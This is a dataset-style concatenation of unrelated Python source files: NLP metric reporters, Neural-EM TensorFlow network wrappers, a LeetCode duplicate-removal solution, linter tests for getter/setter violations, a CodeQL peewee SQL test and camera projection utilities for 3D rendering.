def aggregate_scores(self, batch_scores):
self.aggregate_tuple_data(self.all_scores, batch_scores)
def calculate_metric(self):
list_score_pred_expect = []
for label_idx, _ in enumerate(self.label_names):
list_score_pred_expect.append(
list(
itertools.chain.from_iterable(
(
LabelPrediction(s, p, e)
for s, p, e in zip(
scores[label_idx], pred[label_idx], expect[label_idx]
)
if e != self.pad_idx[label_idx]
)
for scores, pred, expect in zip(
self.all_scores, self.all_preds, self.all_targets
)
)
)
)
metrics = compute_multi_label_multi_class_soft_metrics(
list_score_pred_expect, self.label_names, self.label_vocabs
)
return metrics
def batch_context(self, raw_batch, batch):
return {}
@staticmethod
def get_model_select_metric(metrics):
return metrics.average_overall_precision
class SequenceTaggingMetricReporter(MetricReporter):
def __init__(self, label_names, pad_idx, channels):
super().__init__(channels)
self.label_names = label_names
self.pad_idx = pad_idx
@classmethod
def from_config(cls, config, tensorizer):
return SequenceTaggingMetricReporter(
channels=[ConsoleChannel(), FileChannel((Stage.TEST,), config.output_path)],
label_names=list(tensorizer.vocab),
pad_idx=tensorizer.pad_idx,
)
def calculate_metric(self):
return compute_classification_metrics(
list(
itertools.chain.from_iterable(
(
LabelPrediction(s, p, e)
for s, p, e in zip(scores, pred, expect)
if e != self.pad_idx
)
for scores, pred, expect in zip(
self.all_scores, self.all_preds, self.all_targets
)
)
),
self.label_names,
self.calculate_loss(),
)
def batch_context(self, raw_batch, batch):
return {}
@staticmethod
def get_model_select_metric(metrics):
return metrics.accuracy
class Span(NamedTuple):
label: str
start: int
end: int
def convert_bio_to_spans(bio_sequence: List[str]) -> List[Span]:
"""
Process the output and convert to spans for evaluation.
"""
spans = [] # (label, startindex, endindex)
cur_start = None
cur_label = None
N = len(bio_sequence)
for t in range(N + 1):
if (cur_start is not None) and (t == N or re.search("^[BO]", bio_sequence[t])):
assert cur_label is not None
spans.append(Span(cur_label, cur_start, t))
cur_start = None
cur_label = None
if t == N:
continue
assert bio_sequence[t]
if bio_sequence[t][0] not in ("B", "I", "O"):
bio_sequence[t] = "O"
if bio_sequence[t].startswith("B"):
cur_start = t
cur_label = re.sub("^B-?", "", bio_sequence[t]).strip()
if bio_sequence[t].startswith("I"):
if cur_start is None:
newseq = bio_sequence[:]
newseq[t] = "B" + newseq[t][1:]
return convert_bio_to_spans(newseq)
continuation_label = re.sub("^I-?", "", bio_sequence[t])
if continuation_label != cur_label:
newseq = bio_sequence[:]
newseq[t] = "B" + newseq[t][1:]
return convert_bio_to_spans(newseq)
# should have exited for last span ending at end by now
assert cur_start is None
return spans
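# Illustrative sketch, not part of the original module: a tiny example of the
# spans produced by `convert_bio_to_spans`. The function name is hypothetical.
def _example_convert_bio_to_spans():
    # Returns [Span('PER', 0, 2), Span('LOC', 3, 4)]: span indices are
    # half-open, so the PER span covers tokens 0 and 1.
    return convert_bio_to_spans(["B-PER", "I-PER", "O", "B-LOC"])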
class NERMetricReporter(MetricReporter):
def __init__(
self,
label_names: List[str],
pad_idx: int,
channels: List[Channel],
use_bio_labels: bool = True,
) -> None:
super().__init__(channels)
self.label_names = label_names
self.use_bio_labels = use_bio_labels
self.pad_idx = pad_idx
assert self.use_bio_labels
@classmethod
def from_config(cls, config, tensorizer):
        return cls(
channels=[ConsoleChannel()],
label_names=list(tensorizer.vocab),
pad_idx=tensorizer.pad_idx,
)
def calculate_metric(self) -> PRF1Metrics:
all_confusions = AllConfusions()
for pred, expect in zip(self.all_preds, self.all_targets):
pred_seq, expect_seq = [], []
for p, e in zip(pred, expect):
if e != self.pad_idx:
pred_seq.append(self.label_names[p])
expect_seq.append(self.label_names[e])
expect_spans = convert_bio_to_spans(expect_seq)
pred_spans = convert_bio_to_spans(pred_seq)
expect_spans_set = set(expect_spans)
pred_spans_set = set(pred_spans)
true_positive = expect_spans_set & pred_spans_set
false_positive = pred_spans_set - expect_spans_set
false_negative = expect_spans_set - pred_spans_set
all_confusions.confusions += Confusions(
TP=len(true_positive), FP=len(false_positive), FN=len(false_negative)
)
for span in true_positive:
all_confusions.per_label_confusions.update(span.label, "TP", 1)
for span in false_positive:
all_confusions.per_label_confusions.update(span.label, "FP", 1)
for span in false_negative:
all_confusions.per_label_confusions.update(span.label, "FN", 1)
return all_confusions.compute_metrics()
def batch_context(self, raw_batch, batch):
return {}
@staticmethod
def get_model_select_metric(metrics):
return metrics.micro_scores.f1
|
network.py
|
sjoerdvansteenkiste/Neural-EM
| 116 |
69559
|
<gh_stars>100-1000
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
import tensorflow as tf
import tensorflow.contrib.slim as slim
from sacred import Ingredient
from tensorflow.contrib.rnn import RNNCell
from utils import ACTIVATION_FUNCTIONS
net = Ingredient('network')
@net.config
def cfg():
use_NEM_formulation = False
input = []
recurrent = [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': False}
]
output = [
{'name': 'fc', 'size': 784, 'act': '*', 'ln': False},
]
net.add_named_config('flying_mnist', {
'input': [
{'name': 'input_norm'},
{'name': 'reshape', 'shape': (24, 24, 1)},
{'name': 'conv', 'size': 32, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'conv', 'size': 64, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'conv', 'size': 128, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'reshape', 'shape': -1},
{'name': 'fc', 'size': 512, 'act': 'elu', 'ln': True}
],
'recurrent': [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': True}
],
'output': [
{'name': 'fc', 'size': 512, 'act': 'relu', 'ln': True},
{'name': 'fc', 'size': 3 * 3 * 128, 'act': 'relu', 'ln': True},
{'name': 'reshape', 'shape': (3, 3, 128)},
{'name': 'r_conv', 'size': 64, 'act': 'relu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'r_conv', 'size': 32, 'act': 'relu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'r_conv', 'size': 1, 'act': '*', 'stride': [2, 2], 'kernel': (4, 4), 'ln': False},
{'name': 'reshape', 'shape': -1}
]})
net.add_named_config('flying_shapes', {
'input': [
{'name': 'reshape', 'shape': (28, 28, 1)},
{'name': 'conv', 'size': 32, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'conv', 'size': 64, 'act': 'elu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'reshape', 'shape': -1},
{'name': 'fc', 'size': 512, 'act': 'elu', 'ln': True},
],
'recurrent': [
{'name': 'rnn', 'size': 100, 'act': 'sigmoid', 'ln': True}
],
'output': [
{'name': 'fc', 'size': 512, 'act': 'relu', 'ln': True},
{'name': 'fc', 'size': 7*7*64, 'act': 'relu', 'ln': True},
{'name': 'reshape', 'shape': (7, 7, 64)},
{'name': 'r_conv', 'size': 32, 'act': 'relu', 'stride': [2, 2], 'kernel': (4, 4), 'ln': True},
{'name': 'r_conv', 'size': 1, 'act': '*', 'stride': [2, 2], 'kernel': (4, 4), 'ln': False},
{'name': 'reshape', 'shape': -1},
]})
net.add_named_config('shapes', {
'input': [],
'recurrent': [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': False}
],
'output': [
{'name': 'fc', 'size': 784, 'act': '*', 'ln': False}
]})
net.add_named_config('NEM', {
'use_NEM_formulation': True,
'input': [],
'recurrent': [
{'name': 'rnn', 'size': 250, 'act': 'sigmoid', 'ln': False}
],
'output': [
{'name': 'fc', 'size': 784, 'act': 'sigmoid', 'ln': False}
]})
# GENERIC WRAPPERS
class InputWrapper(RNNCell):
"""Adding an input projection to the given cell."""
def __init__(self, cell, spec, name="InputWrapper"):
self._cell = cell
self._spec = spec
self._name = name
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
projected = None
with tf.variable_scope(scope or self._name):
if self._spec['name'] == 'fc':
projected = slim.fully_connected(inputs, self._spec['size'], activation_fn=None)
elif self._spec['name'] == 'conv':
projected = slim.conv2d(inputs, self._spec['size'], self._spec['kernel'], self._spec['stride'], activation_fn=None)
else:
raise ValueError('Unknown layer name "{}"'.format(self._spec['name']))
return self._cell(projected, state)
class OutputWrapper(RNNCell):
def __init__(self, cell, spec, n_out=1, name="OutputWrapper"):
self._cell = cell
self._spec = spec
self._name = name
self._n_out = n_out
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._spec['size']
def __call__(self, inputs, state, scope=None):
output, res_state = self._cell(inputs, state)
projected = None
with tf.variable_scope((scope or self._name)):
if self._spec['name'] == 'fc':
projected = slim.fully_connected(output, self._spec['size'], activation_fn=None)
elif self._spec['name'] == 't_conv':
projected = slim.layers.conv2d_transpose(output, self._spec['size'], self._spec['kernel'], self._spec['stride'], activation_fn=None)
elif self._spec['name'] == 'r_conv':
resized = tf.image.resize_images(output, (self._spec['stride'][0] * output.get_shape()[1].value,
self._spec['stride'][1] * output.get_shape()[2].value), method=1)
projected = slim.layers.conv2d(resized, self._spec['size'], self._spec['kernel'], activation_fn=None)
else:
raise ValueError('Unknown layer name "{}"'.format(self._spec['name']))
return projected, res_state
class ReshapeWrapper(RNNCell):
def __init__(self, cell, shape='flatten', apply_to='output'):
self._cell = cell
self._shape = shape
self._apply_to = apply_to
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
batch_size = tf.shape(inputs)[0]
if self._apply_to == 'input':
inputs = slim.flatten(inputs) if self._shape == -1 else tf.reshape(inputs, [batch_size] + self._shape)
return self._cell(inputs, state)
elif self._apply_to == 'output':
output, res_state = self._cell(inputs, state)
output = slim.flatten(output) if self._shape == -1 else tf.reshape(output, [batch_size] + self._shape)
return output, res_state
elif self._apply_to == 'state':
output, res_state = self._cell(inputs, state)
res_state = slim.flatten(res_state) if self._shape == -1 else tf.reshape(res_state, [batch_size] + self._shape)
return output, res_state
else:
raise ValueError('Unknown apply_to: "{}"'.format(self._apply_to))
class ActivationFunctionWrapper(RNNCell):
def __init__(self, cell, activation='linear', apply_to='output'):
self._cell = cell
self._activation = ACTIVATION_FUNCTIONS[activation]
self._apply_to = apply_to
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
if self._apply_to == 'input':
inputs = self._activation(inputs)
return self._cell(inputs, state)
elif self._apply_to == 'output':
output, res_state = self._cell(inputs, state)
output = self._activation(output)
return output, res_state
elif self._apply_to == 'state':
output, res_state = self._cell(inputs, state)
res_state = self._activation(res_state)
return output, res_state
else:
raise ValueError('Unknown apply_to: "{}"'.format(self._apply_to))
class LayerNormWrapper(RNNCell):
def __init__(self, cell, apply_to='output', name="LayerNorm"):
self._cell = cell
self._name = name
self._apply_to = apply_to
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
if self._apply_to == 'input':
with tf.variable_scope(scope or self._name):
inputs = slim.layer_norm(inputs)
return self._cell(inputs, state)
elif self._apply_to == 'output':
output, res_state = self._cell(inputs, state)
with tf.variable_scope(scope or self._name):
output = slim.layer_norm(output)
return output, res_state
elif self._apply_to == 'state':
output, res_state = self._cell(inputs, state)
with tf.variable_scope(scope or self._name):
res_state = slim.layer_norm(res_state)
return output, res_state
else:
raise ValueError('Unknown apply_to: "{}"'.format(self._apply_to))
class InputNormalizationWrapper(RNNCell):
def __init__(self, cell, name="InputNorm"):
self._cell = cell
self._name = name
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def __call__(self, inputs, state, scope=None):
with tf.variable_scope(scope or self._name):
mean, var = tf.nn.moments(inputs, axes=[1])
inputs = (inputs - tf.expand_dims(mean, axis=1)) / tf.sqrt(tf.expand_dims(var, axis=1))
return self._cell(inputs, state)
# EM CELL (WRAPPERS)
class NEMCell(RNNCell):
def __init__(self, num_units, name="NEMCell"):
self._num_units = num_units
self._name = name
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
with tf.variable_scope(scope or self._name):
with tf.variable_scope(scope or "lr"):
lr = tf.get_variable("scalar", shape=(1, 1), dtype=tf.float32)
            # apply z = z' + lr * sigma(z') * (1 - sigma(z')) * W^T * x
output = state + lr * tf.sigmoid(state) * (1 - tf.sigmoid(state)) * slim.fully_connected(
inputs, self._num_units, scope='input', activation_fn=None, biases_initializer=None)
return tf.sigmoid(output), output
class NEMOutputWrapper(RNNCell):
def __init__(self, cell, size, weight_path, name="NEMOutputWrapper"):
self._cell = cell
self._size = size
self._weight_path = weight_path
self._name = name
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._size
def __call__(self, inputs, state, scope=None):
output, res_state = self._cell(inputs, state)
with tf.variable_scope("multi_rnn_cell/cell_0/NEMCell/input", reuse=True):
W_t = tf.transpose(tf.get_variable("weights"))
projected = tf.matmul(output, W_t)
return projected, res_state
# NETWORK BUILDER
@net.capture
def build_network(out_size, output_dist, input, recurrent, output, use_NEM_formulation=False):
with tf.name_scope('inner_RNN'):
# use proper mathematical formulation
if use_NEM_formulation:
cell = NEMCell(recurrent[0]['size'])
cell = tf.contrib.rnn.MultiRNNCell([cell])
cell = NEMOutputWrapper(cell, out_size, "multi_rnn_cell/cell_0/EMCell")
cell = ActivationFunctionWrapper(cell, output[0]['act'])
return cell
# build recurrent
cell_list = []
for i, layer in enumerate(recurrent):
if layer['name'] == 'rnn':
cell = tf.contrib.rnn.BasicRNNCell(layer['size'], activation=ACTIVATION_FUNCTIONS['linear'])
cell = LayerNormWrapper(cell, apply_to='output', name='LayerNormR{}'.format(i)) if layer['ln'] else cell
cell = ActivationFunctionWrapper(cell, activation=layer['act'], apply_to='state')
cell = ActivationFunctionWrapper(cell, activation=layer['act'], apply_to='output')
else:
raise ValueError('Unknown recurrent name "{}"'.format(layer['name']))
cell_list.append(cell)
cell = tf.contrib.rnn.MultiRNNCell(cell_list)
# build input
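        # Input layers are applied in reverse so that the first entry in the
        # spec becomes the outermost wrapper, i.e. the first transformation
        # applied to the raw input before it reaches the recurrent cell.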
for i, layer in reversed(list(enumerate(input))):
if layer['name'] == 'reshape':
cell = ReshapeWrapper(cell, layer['shape'], apply_to='input')
elif layer['name'] == 'input_norm':
cell = InputNormalizationWrapper(cell, name='InputNormalization')
else:
cell = ActivationFunctionWrapper(cell, layer['act'], apply_to='input')
cell = LayerNormWrapper(cell, apply_to='input', name='LayerNormI{}'.format(i)) if layer['ln'] else cell
cell = InputWrapper(cell, layer, name="InputWrapper{}".format(i))
# build output
for i, layer in enumerate(output):
if layer['name'] == 'reshape':
cell = ReshapeWrapper(cell, layer['shape'])
else:
n_out = layer.get('n_out', 1)
cell = OutputWrapper(cell, layer, n_out=n_out, name="OutputWrapper{}".format(i))
cell = LayerNormWrapper(cell, apply_to='output', name='LayerNormO{}'.format(i)) if layer['ln'] else cell
if layer['act'] == '*':
output_act = 'linear' if output_dist == 'gaussian' else 'sigmoid'
cell = ActivationFunctionWrapper(cell, output_act, apply_to='output')
else:
cell = ActivationFunctionWrapper(cell, layer['act'], apply_to='output')
return cell
|
python/080 Remove Duplicates from Sorted Array II.py
|
allandproust/leetcode-share
| 156 |
69564
|
<gh_stars>100-1000
'''
Follow up for "Remove Duplicates":
What if duplicates are allowed at most twice?
For example,
Given sorted array nums = [1,1,1,2,2,3],
Your function should return length = 5, with the first five elements of nums being 1, 1, 2, 2 and 3. It doesn't matter what you leave beyond the new length.
'''
class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
count = 0
for i in range(len(nums)):
if count < 2 or nums[count - 2] != nums[i]:
nums[count] = nums[i]
count += 1
return count
if __name__ == "__main__":
l = [1, 1, 1, 2, 2, 3]
r = Solution().removeDuplicates(l)
assert l == [1, 1, 2, 2, 3, 3]
assert r == 5
|
tests/test_visitors/test_ast/test_classes/test_getter_setter.py
|
notpushkin/wemake-python-styleguide
| 1,931 |
69576
|
<reponame>notpushkin/wemake-python-styleguide<filename>tests/test_visitors/test_ast/test_classes/test_getter_setter.py<gh_stars>1000+
import pytest
from wemake_python_styleguide.violations.oop import (
UnpythonicGetterSetterViolation,
)
from wemake_python_styleguide.visitors.ast.classes import WrongClassBodyVisitor
module_getter_and_setter = """
attribute = 1
def get_attribute():
...
def set_attribute():
...
"""
static_getter_and_setter = """
attribute = 1
class Test(object):
@staticmethod
def get_attribute():
...
@staticmethod
def set_attribute():
...
"""
paired_getter_and_setter = """
class Test(object):
def get_attribute():
...
def set_attribute():
...
"""
property_getter_and_setter = """
class Test(object):
def __init__(self):
self.attribute = 1
@property
def attribute(self):
...
@attribute.setter
def attribute(self):
...
"""
dataclass_property_getter_setter = """
@dataclass
class DataClass(object):
attribute: int
@property
def attribute(self):
...
@attribute.setter
def attribute(self):
...
"""
dataclass_incorrect_property_getter_setter = """
@dataclass
class DataClass(object):
attribute: int
@property
def get_attribute(self):
...
@attribute.setter
def set_attribute(self):
...
"""
dataclass_getter_setter = """
@dataclass
class DataClass(object):
attribute: int
def get_attribute(self):
...
def set_attribute(self):
...
"""
child_getter_and_setter = """
class TestParent(object):
def __init__(self):
self.attribute = 1
class TestChild(TestParent):
def get_attribute(self):
...
def set_attribute(self):
...
"""
nested_getter_and_setter = """
class Template(object):
def __init__(self):
self.attribute = 1
def some_function(self):
def get_attribute(self):
...
def set_attribute(self):
...
get_attribute(self)
"""
class_getter_and_setter_attributes = """
class Test(object):
attribute = 1
get_attribute = 1
set_attribute = 1
"""
instance_getter_and_setter_attributes = """
class Test(object):
def __init__(self):
self.attribute = 1
self.get_attribute = 1
self.set_attribute = 1
"""
other_getter_and_setter = """
class Test(object):
def __init__(self, other):
other.attr = self.some()
def get_attr(self):
return something.unrelated()
"""
instance_attribute_template = """
class Template(object):
def __init__(self):
self.{0}{1}{2}
{3}
def {4}(self):
...
"""
class_attribute_template = """
class Template(object):
{0}{1}{2}
{3}
def {4}:
...
"""
class_mixed = """
class Test(object):
first: int
second = 2
third: int = 3
def __init__(self):
self.{0}{1} = 5
def get_{2}(self):
...
def set_{3}(self):
...
"""
@pytest.mark.parametrize('code', [
module_getter_and_setter,
nested_getter_and_setter,
property_getter_and_setter,
class_getter_and_setter_attributes,
instance_getter_and_setter_attributes,
dataclass_property_getter_setter,
other_getter_and_setter,
])
def test_valid_getter_and_setter(
assert_errors,
parse_ast_tree,
default_options,
code,
mode,
):
"""Testing that correct usage of getter/setter is allowed."""
tree = parse_ast_tree(mode(code))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('code', [
dataclass_getter_setter,
dataclass_incorrect_property_getter_setter,
static_getter_and_setter,
child_getter_and_setter,
paired_getter_and_setter,
])
def test_invalid_getter_and_setter(
assert_errors,
parse_ast_tree,
default_options,
code,
mode,
):
"""Testing that wrong use of getter/setter is prohibited."""
tree = parse_ast_tree(mode(code))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [
UnpythonicGetterSetterViolation,
UnpythonicGetterSetterViolation,
])
@pytest.mark.parametrize('access', [''])
@pytest.mark.parametrize('assignment', [' = 1'])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '', 'get_attribute_some'),
('attribute', '', 'some_get_attribute'),
('attribute', '', 'get_some_attribute'),
('attribute', '', 'attribute_get'),
('some_attribute', '', 'get_attribute'),
('attribute_some', '', 'get_attribute'),
])
def test_nonmatching_instance(
assert_errors,
parse_ast_tree,
default_options,
access,
assignment,
attribute_name,
annotation,
method_name,
mode,
):
"""Testing that non matching attribute and getter/setter is allowed."""
test_instance = instance_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('access', ['', '_', '__'])
@pytest.mark.parametrize('assignment', [
' = 1',
': int = 1',
' = self.other = 1',
', self.other = 1, 2',
])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '', 'get_attribute'),
('attribute', '', 'set_attribute'),
('attribute_some', '', 'get_attribute_some'),
('some_attribute', '', 'set_some_attribute'),
('attribute', '@classmethod', 'get_attribute'),
('attribute', '@classmethod', 'set_attribute'),
('attribute', '@staticmethod', 'get_attribute'),
('attribute', '@staticmethod', 'set_attribute'),
('attribute', '@property', 'get_attribute'),
('attribute', '@attribute.setter', 'set_attribute'),
])
def test_instance_getter_setter(
assert_errors,
parse_ast_tree,
default_options,
access,
assignment,
attribute_name,
annotation,
method_name,
mode,
):
"""Testing that instance attribute and getter/setter is prohibited."""
test_instance = instance_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [UnpythonicGetterSetterViolation])
@pytest.mark.parametrize('access', [''])
@pytest.mark.parametrize('assignment', [' = 1'])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '@classmethod', 'get_attribute_some(self)'),
('attribute', '@classmethod', 'some_get_attribute(self)'),
('attribute', '@classmethod', 'get_some_attribute(self)'),
('attribute', '@classmethod', 'attribute_get(self)'),
('some_attribute', '@classmethod', 'get_attribute(self)'),
('attribute_some', '@classmethod', 'get_attribute(self)'),
])
def test_nonmatching_class(
assert_errors,
parse_ast_tree,
default_options,
access,
attribute_name,
annotation,
method_name,
assignment,
mode,
):
"""Testing that non matching attribute and getter/setter is allowed."""
test_instance = class_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('access', ['', '_', '__'])
@pytest.mark.parametrize('assignment', [
' = 1',
': int = 1',
': int',
' = other = 1',
', other = 1, 2',
])
@pytest.mark.parametrize(('attribute_name', 'annotation', 'method_name'), [
('attribute', '@classmethod', 'get_attribute(cls)'),
('attribute', '@classmethod', 'set_attribute(cls)'),
('attribute_some', '@classmethod', 'get_attribute_some(self)'),
('some_attribute', '@classmethod', 'set_some_attribute(self)'),
('attribute', '', 'get_attribute(cls)'),
('attribute', '', 'set_attribute(cls)'),
('attribute', '@staticmethod', 'get_attribute(cls)'),
('attribute', '@staticmethod', 'set_attribute(cls)'),
])
def test_class_attributes_getter_setter(
assert_errors,
parse_ast_tree,
default_options,
attribute_name,
access,
annotation,
method_name,
assignment,
mode,
):
"""Testing that using getter/setters with class attributes is prohibited."""
test_instance = class_attribute_template.format(
access, attribute_name, assignment, annotation, method_name,
)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [UnpythonicGetterSetterViolation])
@pytest.mark.parametrize('access', ['', '_', '__'])
@pytest.mark.parametrize(('first', 'second', 'third'), [
('attribute', 'some', 'other'),
('attribute', 'some', 'another'),
])
def test_class_mixed(
assert_errors,
parse_ast_tree,
default_options,
access,
first,
second,
third,
mode,
):
"""Testing correct use of methods with get/set in name."""
test_instance = class_mixed.format(access, first, second, third)
tree = parse_ast_tree(mode(test_instance))
visitor = WrongClassBodyVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
|
python/ql/test/library-tests/frameworks/peewee/sql_execution.py
|
madhurimamandal/codeql
| 4,036 |
69584
|
import peewee
import playhouse.pool
# This is just one example of one of the supported databases
# see https://docs.peewee-orm.com/en/latest/peewee/database.html
db = peewee.MySQLDatabase()
conn = db.connection()
cursor = conn.cursor()
cursor.execute("sql") # $ getSql="sql"
cursor = db.cursor()
cursor.execute("sql") # $ getSql="sql"
db.execute_sql("sql") # $ getSql="sql"
# Pool extension
pool = playhouse.pool.PooledMySQLDatabase(...)
pool.execute_sql("sql") # $ getSql="sql"
|
lib/renderer/camera.py
|
YuliangXiu/ICON
| 486 |
69588
|
# -*- coding: utf-8 -*-
# Max-Planck-Gesellschaft zur Förderung der Wissenschaften e.V. (MPG) is
# holder of all proprietary rights on this computer program.
# You can only use this computer program if you have closed
# a license agreement with MPG or you get the right to use the computer
# program from someone who is authorized to grant you that right.
# Any use of the computer program without a valid license is prohibited and
# liable to prosecution.
#
# Copyright©2019 Max-Planck-Gesellschaft zur Förderung
# der Wissenschaften e.V. (MPG). acting on behalf of its Max Planck Institute
# for Intelligent Systems. All rights reserved.
#
# Contact: <EMAIL>
import cv2
import numpy as np
from .glm import ortho
class Camera:
def __init__(self, width=1600, height=1200):
# Focal Length
# equivalent 50mm
focal = np.sqrt(width * width + height * height)
self.focal_x = focal
self.focal_y = focal
# Principal Point Offset
self.principal_x = width / 2
self.principal_y = height / 2
# Axis Skew
self.skew = 0
# Image Size
self.width = width
self.height = height
self.near = 1
self.far = 10
# Camera Center
self.center = np.array([0, 0, 1.6])
self.direction = np.array([0, 0, -1])
self.right = np.array([1, 0, 0])
self.up = np.array([0, 1, 0])
self.ortho_ratio = None
def sanity_check(self):
self.center = self.center.reshape([-1])
self.direction = self.direction.reshape([-1])
self.right = self.right.reshape([-1])
self.up = self.up.reshape([-1])
assert len(self.center) == 3
assert len(self.direction) == 3
assert len(self.right) == 3
assert len(self.up) == 3
@staticmethod
def normalize_vector(v):
v_norm = np.linalg.norm(v)
return v if v_norm == 0 else v / v_norm
def get_real_z_value(self, z):
z_near = self.near
z_far = self.far
z_n = 2.0 * z - 1.0
z_e = 2.0 * z_near * z_far / (z_far + z_near - z_n * (z_far - z_near))
return z_e
def get_rotation_matrix(self):
rot_mat = np.eye(3)
s = self.right
s = self.normalize_vector(s)
rot_mat[0, :] = s
u = self.up
u = self.normalize_vector(u)
rot_mat[1, :] = -u
rot_mat[2, :] = self.normalize_vector(self.direction)
return rot_mat
def get_translation_vector(self):
rot_mat = self.get_rotation_matrix()
trans = -np.dot(rot_mat, self.center)
return trans
def get_intrinsic_matrix(self):
int_mat = np.eye(3)
int_mat[0, 0] = self.focal_x
int_mat[1, 1] = self.focal_y
int_mat[0, 1] = self.skew
int_mat[0, 2] = self.principal_x
int_mat[1, 2] = self.principal_y
return int_mat
def get_projection_matrix(self):
ext_mat = self.get_extrinsic_matrix()
int_mat = self.get_intrinsic_matrix()
return np.matmul(int_mat, ext_mat)
def get_extrinsic_matrix(self):
rot_mat = self.get_rotation_matrix()
int_mat = self.get_intrinsic_matrix()
trans = self.get_translation_vector()
extrinsic = np.eye(4)
extrinsic[:3, :3] = rot_mat
extrinsic[:3, 3] = trans
return extrinsic[:3, :]
def set_rotation_matrix(self, rot_mat):
self.direction = rot_mat[2, :]
self.up = -rot_mat[1, :]
self.right = rot_mat[0, :]
def set_intrinsic_matrix(self, int_mat):
self.focal_x = int_mat[0, 0]
self.focal_y = int_mat[1, 1]
self.skew = int_mat[0, 1]
self.principal_x = int_mat[0, 2]
self.principal_y = int_mat[1, 2]
def set_projection_matrix(self, proj_mat):
res = cv2.decomposeProjectionMatrix(proj_mat)
int_mat, rot_mat, camera_center_homo = res[0], res[1], res[2]
camera_center = camera_center_homo[0:3] / camera_center_homo[3]
camera_center = camera_center.reshape(-1)
int_mat = int_mat / int_mat[2][2]
self.set_intrinsic_matrix(int_mat)
self.set_rotation_matrix(rot_mat)
self.center = camera_center
self.sanity_check()
def get_gl_matrix(self):
z_near = self.near
z_far = self.far
rot_mat = self.get_rotation_matrix()
int_mat = self.get_intrinsic_matrix()
trans = self.get_translation_vector()
extrinsic = np.eye(4)
extrinsic[:3, :3] = rot_mat
extrinsic[:3, 3] = trans
axis_adj = np.eye(4)
axis_adj[2, 2] = -1
axis_adj[1, 1] = -1
model_view = np.matmul(axis_adj, extrinsic)
projective = np.zeros([4, 4])
projective[:2, :2] = int_mat[:2, :2]
projective[:2, 2:3] = -int_mat[:2, 2:3]
projective[3, 2] = -1
projective[2, 2] = (z_near + z_far)
projective[2, 3] = (z_near * z_far)
if self.ortho_ratio is None:
ndc = ortho(0, self.width, 0, self.height, z_near, z_far)
perspective = np.matmul(ndc, projective)
else:
perspective = ortho(-self.width * self.ortho_ratio / 2,
self.width * self.ortho_ratio / 2,
-self.height * self.ortho_ratio / 2,
self.height * self.ortho_ratio / 2, z_near,
z_far)
return perspective, model_view
def KRT_from_P(proj_mat, normalize_K=True):
res = cv2.decomposeProjectionMatrix(proj_mat)
K, Rot, camera_center_homog = res[0], res[1], res[2]
camera_center = camera_center_homog[0:3] / camera_center_homog[3]
trans = -Rot.dot(camera_center)
if normalize_K:
K = K / K[2][2]
return K, Rot, trans
def MVP_from_P(proj_mat, width, height, near=0.1, far=10000):
'''
Convert OpenCV camera calibration matrix to OpenGL projection and model view matrix
    :param proj_mat: OpenCV camera projection matrix
:param width: Image width
:param height: Image height
:param near: Z near value
:param far: Z far value
:return: OpenGL projection matrix and model view matrix
'''
res = cv2.decomposeProjectionMatrix(proj_mat)
K, Rot, camera_center_homog = res[0], res[1], res[2]
camera_center = camera_center_homog[0:3] / camera_center_homog[3]
trans = -Rot.dot(camera_center)
K = K / K[2][2]
extrinsic = np.eye(4)
extrinsic[:3, :3] = Rot
extrinsic[:3, 3:4] = trans
axis_adj = np.eye(4)
axis_adj[2, 2] = -1
axis_adj[1, 1] = -1
model_view = np.matmul(axis_adj, extrinsic)
zFar = far
zNear = near
projective = np.zeros([4, 4])
projective[:2, :2] = K[:2, :2]
projective[:2, 2:3] = -K[:2, 2:3]
projective[3, 2] = -1
projective[2, 2] = (zNear + zFar)
